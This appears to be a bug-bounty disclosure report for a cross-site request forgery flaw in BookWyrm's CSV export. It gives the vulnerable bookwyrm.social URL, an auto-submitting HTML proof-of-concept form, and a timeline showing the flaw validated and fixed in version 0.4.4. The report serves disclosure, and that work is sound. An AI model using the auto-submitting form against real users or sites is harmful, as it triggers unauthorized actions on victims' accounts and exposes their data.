Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 11th 2022

Description

An attacker is able to download data from a user via the CSV Export function. The export will include all the books on your shelves, books you have reviewed, and books with reading activity.

Vulnerable URL

https://bookwyrm.social/preferences/export/file

Proof of Concept

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://bookwyrm.social/preferences/export/file">
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

Impact

This vulnerability is capable of download user reading data.

Occurrences

export.py L24-L52

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. a year ago

A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago

Mouse Reeve validated this vulnerability a year ago

KhanhCM has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Mouse Reeve marked this as fixed in 0.4.4 with commit f1ae64 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

export.py#L24-L52 has been validated

to join this conversation